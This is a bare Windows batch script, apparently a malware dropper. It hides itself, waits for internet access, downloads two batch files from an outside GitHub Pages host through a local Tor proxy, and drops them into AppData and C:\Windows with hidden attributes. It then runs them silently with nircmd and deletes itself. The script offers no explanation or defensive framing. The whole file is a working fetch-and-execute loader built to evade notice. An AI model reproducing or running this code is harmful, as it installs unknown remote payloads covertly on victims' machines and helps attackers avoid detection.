@echo off
attrib +s +h +i "%~f0"
:connectivitycheck
ping www.google.com -n 1 -w 5000 >NUL
if errorlevel 1 goto Connectivitycheck
curl.exe --socks5-hostname 127.0.0.1:9050 https://cryptedlumos.github.io/win32.bat --output "%AppData%\Microsoft\Windows\Templates\win32.bat" && attrib +s +h +i "%AppData%\Microsoft\Windows\Templates\win32.bat"
curl.exe --socks5-hostname 127.0.0.1:9050 https://cryptedlumos.github.io/win64.bat --output "C:\Windows\win64.bat" && attrib +s +h +i "C:\Windows\win64.bat"
timeout -t 300
nircmd exec hide "%appdata%\microsoft\windows\templates\win32.bat"
nircmd exec hide "C:\Windows\win64.bat"
DEL /s /f /q /a "%~f0"
